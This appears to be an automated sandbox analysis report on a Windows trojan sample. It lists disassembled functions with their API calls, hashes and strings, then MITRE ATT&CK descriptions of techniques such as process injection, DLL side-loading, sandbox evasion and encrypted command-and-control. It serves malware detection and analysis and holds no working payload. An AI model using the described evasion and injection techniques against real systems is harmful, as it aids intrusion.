Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA

_free.LIBCMT ref: 00FB9D57
_free.LIBCMT ref: 00FB9D69
_free.LIBCMT ref: 00FB9D7B
_free.LIBCMT ref: 00FB9D8D

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d37f5a9740c51d8e5b4719ac0f4aaa88d4a100d74382cc07b0da613e4bc0a18
Instruction ID: 08a39970847d571175de5de5ea9a1f5d42c7029406349618b694c565436737b1
Opcode Fuzzy Hash: 7d37f5a9740c51d8e5b4719ac0f4aaa88d4a100d74382cc07b0da613e4bc0a18
Instruction Fuzzy Hash: ECF0623280C304678630FB6BE982CAAB3E9AB843603644805F584D7700CB74FCC17EB4

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6E05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, xrefs: 00FB6E43, 00FB6E4A, 00FB6E7E

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
API String ID: 0-1364279115
Opcode ID: 0f769458a007173763f78a7ea07ba869c5870bb92a0ee20393c444383f2bba0c
Instruction ID: 6a12319349e841c71a7dfebc2788e678581b3556846ef8972332dd88474030f2
Opcode Fuzzy Hash: 0f769458a007173763f78a7ea07ba869c5870bb92a0ee20393c444383f2bba0c
Instruction Fuzzy Hash: DF31B375E04219ABCB21DF9BDD8ADEEBBB8EB85710B14006AF400D7251E7789E40EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB61B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00FB6163,00000000,?,00FC8D08,?,?,?,00FB6306,00000004,InitializeCriticalSectionEx,00FC1C98,InitializeCriticalSectionEx), ref: 00FB61BF
GetLastError.KERNEL32(?,00FB6163,00000000,?,00FC8D08,?,?,?,00FB6306,00000004,InitializeCriticalSectionEx,00FC1C98,InitializeCriticalSectionEx,00000000,?,00FB60BD), ref: 00FB61C9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00FB61F1

Strings

api-ms-, xrefs: 00FB61D6

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 4e5312344d00a7f6689706f7eea742bde06267676cebfd0f2967d7f0abdf5199
Instruction ID: 5d9bea1f93392b2189f3e20af90cf70b191390bfac36db94132c327e01834c86
Opcode Fuzzy Hash: 4e5312344d00a7f6689706f7eea742bde06267676cebfd0f2967d7f0abdf5199
Instruction Fuzzy Hash: DAE012346C0209B6EB202F61DE07F993B55AB11B50F104430FA0DE40E3DB65D961B995

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5184 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00FB524B
___AdjustPointer.LIBCMT ref: 00FB526E
___AdjustPointer.LIBCMT ref: 00FB530A

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 31279f5d4e8b80a7900e300d03162a17dd5e4096c86e13f4d53b282e5a24d0ba
Instruction ID: d7c38ffd9322e8f1ab925645fbbecf180162d4ddb6f39d3bd334d0ec6b5cbc28
Opcode Fuzzy Hash: 31279f5d4e8b80a7900e300d03162a17dd5e4096c86e13f4d53b282e5a24d0ba
Instruction Fuzzy Hash: 7351E272A02B029FDB299F56D941BEA77A4FF44B20F24412DEC0157292E739EC41EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB832A Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00FBC440,?,00000001,00FBAD76,?,00FBC8FA,00000001,?,?,?,00FBAD05,?,?), ref: 00FB832F
_free.LIBCMT ref: 00FB838C
_free.LIBCMT ref: 00FB83C2
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00FBC8FA,00000001,?,?,?,00FBAD05,?,?,?,00FC7520,0000002C,00FBAD76), ref: 00FB83CD

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 349cccf488958607a55af01c0f3c404774101a974b15890331eee5795f4d7c28
Instruction ID: 168832d4c2f80d0cf6e522a003740a5f8c015b637d6f5388fbed55e0763c3d2a
Opcode Fuzzy Hash: 349cccf488958607a55af01c0f3c404774101a974b15890331eee5795f4d7c28
Instruction Fuzzy Hash: D811A3B2A442456AD71136779C86EEB379EABC1BF4B2C0624F611831D2DD358C0BFE25

Uniqueness

Uniqueness Score: -1.00%

Function 00FB8481 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00FB11AD,?,00FB8822,00FB85BF,?,?,00FB11AD,?), ref: 00FB8486
_free.LIBCMT ref: 00FB84E3
_free.LIBCMT ref: 00FB8519
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00FB11AD,?,00FB8822,00FB85BF,?,?,00FB11AD,?), ref: 00FB8524

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 65957def8f4644fb39270c28aa35a740cde0edd3f4350f7c8baf3b7b1fb8150f
Instruction ID: fc488cbf0180f6215802447a75b2b729e6baaa50454225e17487c1b6dab6a534
Opcode Fuzzy Hash: 65957def8f4644fb39270c28aa35a740cde0edd3f4350f7c8baf3b7b1fb8150f
Instruction Fuzzy Hash: 95112972A442056AD72177779C86FEB371E9BC13F0B280624F511831D2DE748C07BE20

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD4D6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001), ref: 00FBD4ED
GetLastError.KERNEL32(?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001,?,00000001,?,00FBC91B,00FBAD05), ref: 00FBD4F9

Part of subcall function 00FBD4BF: CloseHandle.KERNEL32(FFFFFFFE,00FBD509,?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001,?,00000001), ref: 00FBD4CF

___initconout.LIBCMT ref: 00FBD509

Part of subcall function 00FBD481: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FBD4B0,00FBCF22,00000001,?,00FBC3CF,?,?,00000001,?), ref: 00FBD494

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001,?), ref: 00FBD51E

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 02569884d7f7c41d1f7e186d21e3615c58424f05d93aab88a85363c6ff64c82c
Instruction ID: 18da983d201c42786e488f86c176916fa118c9af9ffa45a95c20225b45ba5234
Opcode Fuzzy Hash: 02569884d7f7c41d1f7e186d21e3615c58424f05d93aab88a85363c6ff64c82c
Instruction Fuzzy Hash: BDF01C3684116CBBCF222F92DD05EC93F66FB493F0B444010FA1896121DA32C860FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FB7C6B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FB7C74

Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA

_free.LIBCMT ref: 00FB7C87
_free.LIBCMT ref: 00FB7C98
_free.LIBCMT ref: 00FB7CA9

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9090e076cc2a2df8ee6761bb93cd9720b0417d243ae7519fc509f1741505899e
Instruction ID: b492fc238a199ccbcba406ee819d4cf2174a2d516391e9b92d241d247ac26a03
Opcode Fuzzy Hash: 9090e076cc2a2df8ee6761bb93cd9720b0417d243ae7519fc509f1741505899e
Instruction Fuzzy Hash: A3E04F7480C66CDA8712BF21BE4FCD57B25A7847107468086F80003331C6B90693FFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5780 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FB57A5

Strings

MOC, xrefs: 00FB57B7
RCC, xrefs: 00FB57BF

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 36f9df18eb4d1d079b02131d7fd41de143a751dc63633793e9658a11de796436
Instruction ID: f9d2cae5a95566352a3b9d0ef99020c0e61025de858bd96d96bfd6230d44a254
Opcode Fuzzy Hash: 36f9df18eb4d1d079b02131d7fd41de143a751dc63633793e9658a11de796436
Instruction Fuzzy Hash: 76416631900609EFCF16DFA9CD81AEEBBB5BF48710F188059F905A6221D339D951EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 00FB111B
GetModuleHandleW.KERNEL32(00000000), ref: 00FB1162

Strings

kernel32, xrefs: 00FB1116

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: kernel32
API String ID: 4139908857-541877477
Opcode ID: 07ea15b4c209ff5b672ea0b20710078bd511dab8feac55a0c98cc5b2e3e5864c
Instruction ID: 0e26fc62c92bb7a0b5f58392c106ba05fd72eb3ea755d7411f69f6219bb3e6e6
Opcode Fuzzy Hash: 07ea15b4c209ff5b672ea0b20710078bd511dab8feac55a0c98cc5b2e3e5864c
Instruction Fuzzy Hash: 3021F7B5E0020CEBCB04DFE5DD45AEEBBB4BF48300F108558E905A7240E7389A40DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

task.LIBCPMTD ref: 00FB2AB3
task.LIBCPMTD ref: 00FB2AC2

Strings

dboupzalsfzwvwpyqdpu, xrefs: 00FB2A96

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traits
String ID: dboupzalsfzwvwpyqdpu
API String ID: 1455298312-2047172133
Opcode ID: bd1306977d97fadb83d80f16569a9a57e7677dbd046c4b4c3ffd7bd8b9f4e107
Instruction ID: 7540f884c14613ef2e721e9b3533d5944d05101f63c5a50330f86286fa85b6ae
Opcode Fuzzy Hash: bd1306977d97fadb83d80f16569a9a57e7677dbd046c4b4c3ffd7bd8b9f4e107
Instruction Fuzzy Hash: A8016971944249EBCB00EF58DD42BDEBBB4FB04764F004669E820A73C0DB79AB04DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FB29F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

task.LIBCPMTD ref: 00FB2A43

Strings

oeislvoodubcwjonjrwnhbjfxmsna, xrefs: 00FB2A07
S, xrefs: 00FB2A24

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: char_traitstask
String ID: S$oeislvoodubcwjonjrwnhbjfxmsna
API String ID: 3039116899-104439280
Opcode ID: 5cff5fccbd655541b24092ccbeaea5c6c8e68940bb7dc6242e112fa5366992fc
Instruction ID: 97159203bb6b12d82f870c06bd6507578ea295aa3e9d74b21a34e6be0d2371b6
Opcode Fuzzy Hash: 5cff5fccbd655541b24092ccbeaea5c6c8e68940bb7dc6242e112fa5366992fc
Instruction Fuzzy Hash: 7EF0F970D442088ADB14EFAADA557EEB7B4AF08704F604069D402B7281DB799E08EF59

Uniqueness

Uniqueness Score: -1.00%

Function 00FB7123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 00FB9713: GetEnvironmentStringsW.KERNEL32 ref: 00FB9717

_free.LIBCMT ref: 00FB715E
_free.LIBCMT ref: 00FB7165

Strings

@Mj, xrefs: 00FB7123, 00FB7157

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: _free$EnvironmentStrings
String ID: @Mj
API String ID: 3523873077-1735126492
Opcode ID: 9f3a66131b91011e95283c773f7170fcbae29efaabce5cf845b522577050562f
Instruction ID: eccafcaf118081e4a83d4b0de7d1d9aadce288f13b002f342b8f899fd00c3ee3
Opcode Fuzzy Hash: 9f3a66131b91011e95283c773f7170fcbae29efaabce5cf845b522577050562f
Instruction Fuzzy Hash: B5E0926790D7210AA7313A3F6C02BEA36554BC1370B21025AE820C72E2DEB488437DB9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Overview

General Information

Detection

Signatures

Classification

